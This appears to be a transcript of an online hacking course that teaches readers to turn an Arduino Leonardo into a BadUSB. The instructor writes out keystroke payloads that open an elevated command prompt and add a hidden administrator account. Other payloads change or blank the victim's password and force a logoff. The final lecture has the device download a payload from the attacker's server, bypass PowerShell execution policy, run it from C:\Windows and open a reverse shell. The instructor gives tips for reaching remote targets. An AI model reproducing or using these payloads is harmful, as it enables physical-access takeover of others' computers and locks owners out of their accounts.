the next lectures. But it's better for you to have an overview for it to create your own commands and convert it to Arduino language. I mean, you can program your Arduino Leonardo to do whatever you want. For example, it can change the wallpaper, it can add users, it can delete users, change the password, and yes, gain the full access over any Windows operating system. And actually, these commands are not for the Arduino Leonardo. It's only for the USB rubber ducky, but we can use these commands to convert it to Arduino programming language, as I said before, using this script. So we are going to be using this commands. For example, let's say delay 100, and we will say compile, and it will generate this script that we're going to be using it in the Arduino software. So these commands are specifically for the USB rubber ducky, which is, in my opinion, it's very expensive. So if we go and type USB rubber ducky, you can see it's from Hackshop or Hack5, and it costs about $45. And actually, it looks like a legit USB flash drive, and it's very good. It's better than the Arduino Leonardo, but if you want just to try this, you can just buy the Arduino Leonardo and try all of this. But if you want to make a real scenario, you can buy the USB rubber ducky. But for some reason, it's not loading. Let me check here. And I think that the best one is the USB rubber ducky because it has very good look, it's a good quality, and you can insert any micro SD card into it, and you can do a lot of things on it. And there is a lot of tutorials online shows you how you can use it to do various things. It's not loading, I don't know why, but I'm gonna show you the pictures. So here's it. It's looking like this from the outside, and inside you will see this, and you can insert any micro SD card into it. You can see, and it's very fast. So, but in my opinion, it's a little bit expensive, so that's why I have explained the Arduino Leonardo. So after buying the Arduino Leonardo, we're gonna be moving to the next lecture that will explain everything. And I recommend you using the Arduino Leonardo that we're gonna be talking about it in this section, just to stay on our line and don't be confused of all of these bad USB, because actually there is many types of bad USB. You can buy them from AliExpress, Alibaba is gonna be cheaper for you, but trust me, just buy the Arduino Leonardo and follow me, and once you learn all of this, you can buy whatever you want. You can buy the USB rubber ducky that costs $45, and there is many tutorials online that will improve your knowledge about these things, and you can run many different types of modules, payload, or the thing that you can do it with this USB rubber ducky. Now we have bought the bad USB and we will start to program it using Arduino software that I've talked about in the previous lecture. But before we get started into that, first we need to download and install Arduino program on our computer, and then we will set up the bad USB. Okay, so the first thing we are going to be doing is go and open your browser and go to google.com and just type download Arduino and enter. And I'm going to put all the links in the description and click on the first link and scroll a little bit and you will see download the Arduino IDE. So here I'm going to click on Windows installer and then it's going to ask you to donate to them. So I'm going to say just download. In my case, I have already downloaded. So I'm not going to wait all of this. I'm going to say cancel. And then I'm going to go to my desktop and here is the downloader file or the installer file. So I'm going to double click on it and I'm going to say yes. And now it's going to show me this window because I have already installed Arduino. So I'm not going to reinstall it again because it's very simple and easy. Just click on it, next, and it will be installed. So I'm going to say cancel. Let's move this to here. And here is the icon of Arduino. So now I'm going to click on it. And now it's going to start to initialize the packages and you will see that the interface of Arduino is very simple and easy. So let's wait a little bit. And as you can see, here's the interface of Arduino and it's very simple and easy. We're not going through all of these options because it's very simple. But the most important thing is we need to configure the Arduino Leonardo that we have bought it from the internet with the Arduino interface or with the Arduino program. So first of all, I'm going to plug my Arduino Leonardo to my PC. And here I have plugged my Arduino Leonardo with my PC. And the second thing you are going to be doing is just go to tools, and from here you are going to select Arduino Leonardo. So there is different types of Arduino boards. So you're going to select here Arduino Leonardo. Okay, and then you're going to tools again and you will select the port. So by default it's going to be COM1. You're going to select here your Arduino Leonardo. So I'm going to click here and now everything is ready to go. I'm going to say get board info and here's my board information. So we learned from this lecture how you can download and install Arduino software on your operating system and how you can install. It's very simple and easy. Just download it and double click on it and it will be installed automatically. And here is Arduino program. We learned also how we can configure our Arduino Leonardo to work with it. So now we are just waiting to put the sketch or upload the sketch or the converted commands, and we'll paste it here and everything will be easy. So in this lecture I'm gonna show you all of this. I'm gonna show you how the script works, how we can use the right commands, and how we can run the notepad and type hello world. In the previous video we have installed Arduino software on our computer and we have set up the bad USB to work with it. So in this lecture I would like to start with you with very basic command that you can use with the bad USB, such as opening the notepad and typing hello world and so on. But before we do that we have to learn some basic commands, and then we will use the Arduino script that I've talked about to convert it to C programming language, and this is to make it compatible with the bad USB. Now let's see how to do that. Okay, so the first thing we're going to be doing is we're going to our browser, and then we will go to the link that I've talked about, or the script that I've talked about, that will convert all the USB rubber ducky commands to Arduino language. So here you're going to type the commands, and once you are done you're going to say compile, and here it's going to generate the Arduino script, and you will copy it and paste it in your Arduino program. So the second website that I have also talked about that contains all the commands, and here it contains the command that we can use it with the USB rubber ducky, but actually because we are using this script we can convert these commands to Arduino, and then we can use our Arduino Leonardo as USB rubber ducky. So they are the same, but in my opinion that USB rubber ducky, it's better, it has a better quality, better looking, but it's also expensive, a little bit expensive. So I recommend you to try the Arduino Leonardo first, and then you can buy the USB rubber ducky, and there is tons of tutorials shows you how you can deal with USB rubber ducky. So let's explain some commands, or very important commands. The RAM is used to describe the command that you will type it. For example, RAM, this code will run the notepad and type hello world, just for example, and it will not affect the commands. And the default delay and the delay are going to delay for a certain period of time. So it could be 100 milliseconds, 1000 milliseconds, 10,000 milliseconds. And here we are dealing with the milliseconds, not with the seconds, because it's called the bad USB and it's very fast. So we are dealing with the milliseconds. So here it's showing you also an example and the description of it, and I highly recommend you to read these comments and learn more about it, because this will help you to create your own comments, and so you can do various multiple things at the same time. And also we have the string command that will type something. So for example, we're gonna say string hello world, so it's gonna type hello world on our screen, or string notepad.exe, so it's gonna type notepad.exe, cmd.exe, or whatever you want. So here we are seeing we can see an example, string hello world, so it's gonna type hello world in the notepad. And I'm gonna show you in this lecture how we can run the notepad and how we can type hello world, as I said before. And this is a very important command as well. It's called Windows, or you can call it GUI, and it's gonna hold the Windows key, and with something. For example, we can say GUI R, that will hold the Windows key and press R at the same time, and then it will run the run box. Here is it. Okay, for example, when you hold the Windows key and when you click on R at the same time, you get this run box. And here you can use the shift. There is many commands that you can use it, and it's very easy in my opinion, and it's very short. You can see, and we are done. It's very easy. So here we have the arrow keys, we have the control, we have the alt and shift, and etc. And in my opinion, it's very easy and simple, and it helps you to do multiple things at the same time. So let's start with typing some commands that will allow us to run the notepad automatically and type hello world. So first I'm gonna start with delay. Okay, so I highly recommend you to use delay at the first of your commands, because it will make everything in order and nothing will be conflicted with the another commands. For example, because when you use many commands at the same time without delaying the seconds, or typing or delay the comments from each other, it will be there will be conflict and nothing's gonna work with you perfectly. So first I'm gonna say delay, and I'm gonna delay it for example 500 milliseconds. Okay, so it's half a second. So then I'm gonna say GUI R, and this will hold the Windows key and press R at the same time. So then I'm gonna say delay again. We can delay here for 300 milliseconds, and then we can say for example here we will say string string that will type something, and we're gonna say notepad, so it's gonna type notepad.exe. And make sure that all of the commands are in capital letter. It's not gonna work with you if you are typing in small letters. And then we're gonna say delay again for 300 milliseconds, and then I'm gonna say enter, and I'm gonna say enter, so it's gonna press enter after that. And then we're gonna say delay again, delay for 300 milliseconds, and then string or type hello world. Okay, so we're gonna repeat this command again. So first it's gonna delay for 500 milliseconds. Once you plug it in, it's gonna delay for 500 milliseconds. It's not gonna do anything, just wait for 500 milliseconds, and then it's gonna press the Windows key and R at the same time. that will run the round box that I've showed you before, and then it's gonna wait 300 milliseconds again. And after waiting for 300 milliseconds, it's gonna type notepad.exe, and then it's gonna wait for 300 milliseconds, and then it's gonna press enter, and the notepad should run perfectly with you. And then it's gonna wait for 300 milliseconds, and then it's gonna type, using string, it's gonna type hello world, and that's it. It's very simple and easy. So now I'm gonna click on compile, and you will see this is the Arduino script that we're gonna using it. So we're gonna copy it, then we'll come back to Arduino. So let me run it first, and then we want to make sure that it's plugged in. Okay, so I'm going to tools, and the board has to be Arduino Leonardo, and the port is, I'm going to select it to Arduino Leonardo, so make sure that it's selected. So as you can see now, everything is selected, and here is the board information. So now I'm going to delete this script because we don't need it, and then I'm going to pass the one that we have copied from the website, and here is it. And then we can say upload. Okay, so I'm going to click on upload, and now it's going to ask me if I want to save the sketch. So the sketch basically is this script will be saved as with the Arduino extensions in order to use it in the next time, so you don't have to type all of these commands and convert it, compile it, and copy it, paste it, and upload it again. So it will be a ready sketch, and then you can upload it to your new Arduino board. Okay, so I have only one Arduino Leonardo, so I'm not gonna save it. You can save it, that's up to you, and in my opinion it's better for you if you want to save it. So this will save the time and all of this. In my opinion, I'm gonna say cancel, and now it's going to start uploading. So once it uploads, it will disconnect and connect again, and hopefully it's gonna work. Okay, so here you can see that it didn't work perfectly, and the reason is it typed notepad.exe hello world in here, so it didn't type it in here. So this is the issue. So the thing is, we need to close Arduino program, cancel, and let's just make a refresh. It's just a legit computer in stand mode. And now we're going to disconnect the Arduino Leonardo, so let me just disconnect it, and I will connect it again. So now I'm going to disconnect it, and now I'm going to connect it again. And as you can see, it's working perfectly, and all of this happened in about, I don't know, maybe it's 1 second or less, but this was literally fast. You cannot calculate this. So yeah, it's very simple and easy. As I told you before, just type these commands and it will convert it, copy it, paste it, and you will be able to create your own script that will do everything to you. So this was very basic command, okay, that we have used it. But in the next lecture, I'm going to show you advanced things, or actually it's not advanced, it's very easy things. Just use the commands, the right commands, wait, delay, and something like this, and then you will be able to create your own script that will do everything. So it can delete files, add user, delete users, remove password, get some privileges, get a reverse shell. You can do tons of things. Okay, so now we are done. Let's move to the next lecture. In the previous video, we've seen how we can write very basic command that will run the notepad automatically and type hello world. So in this video, I'm going a step further and show you how you can change the administrator password to whatever you want. And then you will add a new user with the administrator privileges with a certain password to the target computer. And after all of this, you will force him to sign out, and whenever he will try to log in, he will see that his password has been changed, and he will see that there is a new user has been added. So before we get into all of this and type all the commands, I would like to show you all of this in the command prompt. So we are going to do this using the command prompt, and then we will do all of this and type all the commands and then convert it to Arduino script. So now let's start. First I'm going to my Windows menu and then I'm gonna type CMD, and we need to run the CMD as the administrator. So run as administrator, I'm gonna say yes. And now from here we can add user, change the password or whatever you want. So first I'm going to show how we can add user, normal user without the administrator privileges. So I'm gonna type net user. If I type only net user, you will see the accounts that is in this computer, and you will see that the default account is iSecurity Pro and he's an administrator. So if I type net user, then I typed for example, I'm gonna create a new username, and this username is gonna say, let's say for example, this is the username, and the password is going to be test1234. So here I'm going to add double quote, and I'm going to type here test1234, and then to add him to the group I'm gonna say add. So net user, then test, which is the username, and then the password within two quotes, and then we're going to say /add. So if I said enter, you will see the command completed successfully. Now let's go and check this. I'm gonna say manage another account, and you will see that we have a new username with a password protected. So now what I'm gonna do is I'm gonna add this username to the administrator group, and to do this I'm going to say net local group administrators. Then I'm going to add the username that I have created, which is test. So I'm going to add test to the administrator local group, and then I'm going to say /add and enter, and the command has been completed successfully. So if I come back again and manage another account, and you will see that this test has the administrator privileges. So of course I can delete him from here, or I can delete him from the command prompt just by typing net user, and then it's going to be, I believe it's going to be test and /remove. Or it's not gonna be remove, it's going to be delete. I believe it's delete. Yes. So let me check this again. As you can see, the user has been deleted. So, and to change this password or the administrator password, let me say clear. We're going to type net user and then his username. So here you can see that my username is iSecurity Pro. Let me check again and show you that. Or I can show you this that from here. You can see that the default account is iSecurity Pro. So we're going to copy it and type net user. Then we're gonna paste it here. And then we're going to say, for example, if we want to remove the password, we will just add two quotes and we will leave it empty. But if we want to change the password, we are going to type here the password. Let's say, for example, my name, then 1234, and then we're going to press enter. So now I'm not going to change the password, and I cannot, unfortunately, I cannot record once we sign out from the computer, but I'm showing you all of this. And if you face any problem, and you will not face any problem, just contact me, send me any message, and I'll be glad to respond. But you will not face any issue, I promise. Let me change the password and show you just an example. So now the password has been changed, and the problem is I cannot sign out and show you this example because the record will be stopped. But this way, just by typing this command, you will change the password, or you can remove any password you want. So now let's leave it to sad1234. I'm going to say exit X, and now we'll move to learn how we can type the correct commands. Okay, so now I'm going to open my browser, and then I'm going to the script that I've talked about before, and then I'm going to start to type the commands. So first I'm going to type delay for 500 milliseconds, and then I'm going to say Windows to press the Windows key that will pop up the Windows menu, and then I'm going to say delay again for 400 milliseconds, and then type CMD, string CMD, and then also delay for let's say for 400 milliseconds, and press enter. and once it press enter, it will oh no, let me say delay for 700 millisecond or for 500 millisecond, and then I'm going to say control. I'm going to say control shift enter, and this will ask the user to run the program with administrator privileges. So I'm going to show you that. So I'm going to type cmd, and I'm going to hold on control shift enter at the same time, and now it's going to ask me if I want to run this cmd with the administrator privileges, and then I can say no or yes. So here I'm going to say delay. So here we're going to say 700 milliseconds because usually it takes some times, and I'm going to say left arrow because once it pop up the window that will ask us for this, it's going to say no or yes, and the yes button is going to be on the left side. So that's why I've clicked left arrow to go to the left side, as then delay for, let's say, 600 milliseconds, and press enter, and then it has to run the cmd with the administrator privileges. Fine. So I'm going to say compile right now, and I'm going to get this code, copy it, and paste it with my Arduino. So right now I'm going to run the program, and I'm going to wait a little bit until it initializes all the packages. So I'm going to paste it right here, and going to tool, and I'm going to make sure that it's selected and it's Arduino Leonardo and it's good. And let me say upload, cancel. I'm going to minimize the window, and let's see the result. So now the goal is just to run the cmd with the administrator privileges, and then we can continue the commands. As you can see, there was an error right here. So I'm going to close the program, and I'm going to disconnect it and to connect it again. And as you can see, it's running perfectly. So if I typed who am I'll still, yeah, iSecurity Pro, but I'm with the administrator privileges. Okay, so until now everything is fine. Just we need to continue the commands. So I'm going to say delay again for, I don't know, I think 400 milliseconds going to be enough, and then I'm going to type string. So here will be all the commands. So first we will add a new user with the we're going to add new user, and then we are going to add him to the local group, the administrator local group, and then we can change the original administrator password. So I'm going to type net user as we saw before, and then I'm going to add the user that I want to create it. I'm going to say test number 2, and let's say that the password, I'm going to add 2 quotes, and within the 2 quotes I'm going to add the password, which is going to be let's say this 1 2 3 4 5, and then I'm going to add /add. That will add him. So to write more than comment at the same time, we are going to add double and then I'm going to say net again. So here we have created the user, okay, and it's called test2, and it has this password, and we have added him. And now we're going to use another command at the same time that will add him to the administrator local group. So I'm going to say local group administrators, and then I'm going to add his username, which is test2, and /add. So until now we are able to add a new user and add him to the administrator local group, so he's an administrator. So I'm going to use another command at the same time that will change the actual administrator password, which is iSecurity Pro. So I'm going to type net user iSecurity Pro, and we can add 2 quotes and leave them empty if we want to delete the password, or we can add a new password, let's say the password is going to be QWERASDF, just for example, and this will change his password. Okay, and to force him to sign out, I'm going to show you the command, but actually I cannot use it because it will sign out and it will shut down the recording program, so everything will be lost. But oh, okay, let me say X. But I'm going to show you the command that's used. So I'm going to say double and then I'm going to say shut down, and then it will be /L for log off and /force to force him to log off, because if he's running a multi-program in the background, it will log off, but it's gonna ask him if you want to close all of these running programs, and of course it's gonna say cancel and he will get back. So we say force to force him to sign out, and whenever he tries to log in, he will see that his password has been changed and a new user has been added with the administrator privileges, so he's been kicked off of his computer. Actually, I cannot use this command because it will sign out and just cancel the record. So I'm going to remove it and stop until here. And let me say, okay, delay for 400 let me say 500 milliseconds and enter. So this will enter all of these commands. And then I'm going to say delay again. I think 300 milliseconds is going to be enough. And I'm going to say string exit. That will exit the command prompt. Delay 300 300, and then enter. So this will exit. So let me start all of this from the beginning. So delay, we will delay him for 500 milliseconds, and then it's going to press the Windows key that will pop up the Windows menu, and then it's going to wait for 400 milliseconds, and string to type CMD, and to run the CMD as the administrator, we're going to hold all of these keys, Control Shift Enter at the same time, and then we're going to say left arrow that will select yes, and we're gonna wait for this and say enter. So until now we were able to run the CMD with the administrator privileges. So then we're gonna wait, and we're going to type net user test, the username that you want to create it and his password, and you can leave him empty if you want. And then we are going to add him, and then we're gonna add this user to the administrator local group by typing this command. Oh, what I've done. Okay. And then I'm going to add double and add to use more than command at the same time. So here we are going to change the actual administrator password, which is iSecurity Pro, to QWERASDF. And of course, I showed you how you can kick him off. Just you can add the double and shut down /L to log off and /F to force him to log off. And then I'm going to say delay for 500 milliseconds and enter to execute all of these commands. And we'll wait till 300 milliseconds, string type, and it will type exit, and then it's going to say enter. So now let me copy all of these commands or this script and come back to my Arduino program. So I'm going to make sure that it's connected, and it's connected here. I'm going to move to delete this code and paste the new one, and then I'm going to say, let me see the users right here. So there is no users right now. I'm going to say upload, cancel, and it could not work for the first time because it's running Arduino. So we're going to close Arduino program and disconnect it and connect it again, and it's gonna work with us. So as you can see, it's not working. Now let me close the program. Okay, now we will disconnect it and connect it again. So now I think everything has been working, and that happened within 3 seconds, about 3 or I don't know 2-3 seconds. Let me check all of this. So manage another account, and you will see that we have a new user called test2, and it's protected with the password, and it's with the administrator privileges. And actually we have changed this password, the iSecurity Pro password, and you can check this, but unfortunately I cannot check this because I cannot sign out, and as I told you before, so it could not work with you for the first time or for the second time. But my recommendation is to disconnect it for 3 seconds and leave it, and after 3 seconds connect it again, and it's going to work perfectly with you. So we learned from this lecture how we can add a new user with the password with the administrator privileges, and how we can change the administrator password, or how we can delete his password, and lastly we can force him to sign out, and whenever he tries to log in, he's going to see that his password has been changed and a new user has been added. But as I told you before, I cannot record this just because of the record. So in the next lecture, I'm going to show you how you can gain the full access over the target machine just by plugging the USB stick, as you saw in the demonstration video. We will just download the program through the CMD, and we will run it, and we will get this access. Now we're going to see how we can gain the full access over any Windows operating system just by plugging our Arduino Leonardo to it. And this is going to happen in about 3 or 2 seconds or less. So the idea here is we are going to enable our Linux web server, and we're going to put our undetectable payload into it. And then we're going to set a listener to listen for the incoming connections, and then we're going to program the Arduino Leonardo to download this file and execute it automatically. So now let me go to my Linux machine, and here you can see that I have already set the listener, and we have talked about all of this in a previous lectures, and it's on port 8080, and the connection is HTTPS. So, and it's very important to enable your Apache web server, so I'm going to show you that my Apache web server is enabled. Okay, you can see that it's active. And if I go to my web server, you can see that my payload is there, and it's called payload7.exe. So whenever I type my Linux IP address and the payload7.exe, you'll be able to download it through the browser. So now let me come back to my Windows machine and show you how we can program it. Okay, so before we do all of this, I would like to show you the commands and explain my idea to you. So first of all, we are going to create a PowerShell file that will download our payload from our Linux machine to the target machine. So just let me clarify what I'm talking about. So right now I'm in the desktop. If I type cd desktop, I'll be in the desktop, and the command that I'm going to use it is echo, and then I'm gonna say wget. And this command is used to download the file through PowerShell, and then I'm gonna put double quotes, and inside or between these two quotes I'm gonna put my Linux IP address followed with the payload name. So I'm gonna put 192.168.226 and 146/payload7.exe. So here, very important is, if you are hacking in your internal network, you can put your internal IP address. But if you are hacking someone who is over WAN network, so it's very important here to put the direct URL of your exe file. And there is many websites online allows you to upload your file or your exe file, and it will give you the direct URL of the file. So here, very important to put the direct URL. And I'm gonna put all the links in the description. And the next thing we need to type is minus output or out file. That will generate a file called, let's say for example, you can call it whatever you want, but I'm gonna call it shell.exe. And then we're gonna save this command into a file called download.ps1, and ps1 is the extension of PowerShell. So now let me repeat the command. Echo, we are calling wget to download this file from this direct URL, which is our the direct URL of our Linux with the payload name. And once we run this once we run this file, we will execute this command that will download this payload, and it will generate a file called shell.exe. So it's not gonna be called payload 7. It will be called shell.exe. So then I'm going to say and to run more than one command at the same time, and I'm going to say PowerShell, and this is to run PowerShell, and then I'm going to say minus execution policy, and it will be bypass, and it will bypass this file. So the file is download. So here we need to specify the file that we have generated, which is download.ps1. So now let me repeat the command again. So echo will call wget to download this file from our Kali Linux web server, and it will be generated and called shell.exe. So it's not going to be payload 7.exe, and this command will be saved into a file called download.ps1. So once we generate this file, this command will run, and it will run the PowerShell, and it will run this file that contains this command that will be executed once I hit enter. So just let me show you right now. I'm going to press enter. As you can see, I have generated two files at the same time. So this is the first command that has generated the shell.exe, and the second command, the first command has just created this file, and the second command has run this download.ps1 and gave us the shell.exe. So if I run shell.exe, I will be able to get a reverse connection. So, but I'm not gonna do all of this right here. I'm gonna do this in the C drive in a file called Windows. So now no one will come here and check the files. And I'm going to run it just by typing shell.exe. So it's very simple. And to do this, you need to get the administrator privileges, or to run CMD with the administrator privileges. Okay, so now let's start typing the right command that will do all of this at the same time. So now let me delete all of this, and let me go to this website that I've talked about, and I'm gonna start with delay for 500 milliseconds. So right now, delay, and I'm gonna say Windows. That will press the Windows key, and it's going to delay for 300 milliseconds, and then it's going to type CMD, and then I'm going to delay it for 400 milliseconds again, and I'm going to say Control Shift Enter. That will hold all the keys at the same time. I press enter, and then I'm going to say delay for 700 milliseconds. That will just wait for 700 milliseconds, and then select the left arrow, and then I'm going to say delay 200, enter. So now we have run the CMD with the administrator privileges, or with as an administrator. So now I'm going to say delay, let's say 300 milliseconds, and I'm going to type string. Now we're going to type all of these commands at the same times. So the command is going to be cd/ that will return us to the C drive, and then I'm going to say and I'm going to say cd Windows. So I'm going to Windows directory, then I'm going to say and now we're going to type the command that I have talked about before. So it's going to be echo wget double quotes, and now I'm going to put my Kali Linux IP address / the payload name, and I'm going to save it and call it shell.exe. Of course you can call it whatever you want. I mean, this name is suspicious, but I just want to call it shell.exe, and I'm going to save it in a file called download.ps1, and then we're going to run the PowerShell to run the download.ps1 file and download our payload on the target machine. So PowerShell and execution policy, and then we're gonna say bypass, and then we're gonna specify the file, which is the file is gonna be download.ps1. And the last step is I'm gonna say and. So now all the files has been downloaded. Now I'm gonna say and I'm going to say shell.exe to run the shell.exe that we have downloaded. So now we are finished, and I think if I say delay for 400 milliseconds and string exit to exit from the CMD, and then delay 200, enter. So we're gonna test it and see how everything's gonna work. So let me repeat the command just to clarify my idea. So I'm gonna say delay. We are dealing delay for 500 milliseconds, and we are pressing the Windows key that will type CMD, and then we said to Ctrl+Shift+Enter to ask us to run it as the administrator, and then we are selecting the left arrow because the left arrow is yes, and then delay 200 milliseconds and press enter, or let's say I don't know, 350 milliseconds, then say enter. After that, once we hit enter, we're gonna wait for 300 milliseconds and we're gonna type this command. So string cd slash that will return us to the C partition, and then we're going or we will change our directory to Windows. Windows is wrong, let me correct it. Okay, let's like this. cd Windows, and then and. So right now we are in C in Windows directory. So now we are gonna generate the file that's called download.ps1, and then we will run this download.ps1 file that will download the shell.exe. And once we get the shell.exe, we're gonna run just by typing shell.exe, and then wait for 400 milliseconds. Actually, we didn't type enter. Okay, so we need to enter this command. So delay for 400 milliseconds and then press enter, and then delay for 300 milliseconds and type string exit delay and enter to exit from CMD. So now let's try this command. Now let me open my Arduino program, and you can see here that my listener is ready and it's just waiting for a reverse connection. So let me come back here, and my USB or my Arduino Leonardo is connected. So now I'm gonna make sure that it's connected. Port Arduino Leonardo. Let me delete all of this and paste the code that we have copied. And probably it's gonna work for this first time or the second time, but as I told you in the previous videos, that we have to disconnect it for 3 seconds and reconnect it again after 3 seconds. So I'm gonna say upload, but this I'm gonna save it. I'm gonna say reverse HTTPS connection. I'm gonna save it here, and I'm going to upload it. So let's wait. And as you can see, it didn't work. So I'm going to close the program. I'm going to say refresh, and I'm going to disconnect it for 3 seconds. And now I'm going to connect it again. So as you can see, now let's check. And as you can see, we have got a reverse connection. So now let's type sessions -i1 pwd. And you can see that I'm in Windows directory, and ls, you can see the files that are in Windows directory, and we can type sysinfo, as you can see. And I think that we have the administrator privileges. I'm not sure about that, but let me check this. Probably we don't have the administrator privileges. Let me type uid or id. It's not working. And as you can see, I'm in Windows directory. So you are not an administrator, but let me try again and see. Maybe we can see the result. But probably we are not an administrator because we didn't run it as an administrator. We run the CMD as an administrator, but yeah, as you can see, it's not working. So we learned from this lecture how you can gain the full access over any Windows operating system just by plugging the Arduino Leonardo, and this happened in about 2 seconds, and it's not gonna work for the first time because you are running Arduino program. So make sure to close it and disconnect it and just wait a little bit and connect it again. And the main problem with this Arduino Leonardo is that it doesn't have a case, so it doesn't have that good look or a legit USB. And the second problem is that sometimes you want to just connect it to go to your computer to edit the commands, and it will just execute the command that you have already programmed. So this is not a good feature, and that's why it's cheap. And I highly recommend buying the USB rubber ducky, but in my opinion, just first try the Arduino Leonardo, and then you can try the USB rubber ducky, because the USB rubber ducky has better look, and there is a button that allows you to disable the code, and then you can plug it into your PC and edit the commands. And once you press the button for the second time, it's going to enable the command, or it could be a malicious command, or it could be, I don't know, whatever you want. You can program whatever you want. And if you like this section, please tell me so that I can make a new course about all of this, or hardware hacking just by plugging this or your Android device. And maybe we can use the Raspberry Pi to hack Wi-Fi networks and etc. So if you are interested in these things, just tell me in the Q&A section, and I will be glad to create a new course. And if you have any question about this section, please tell me and I will be glad to respond.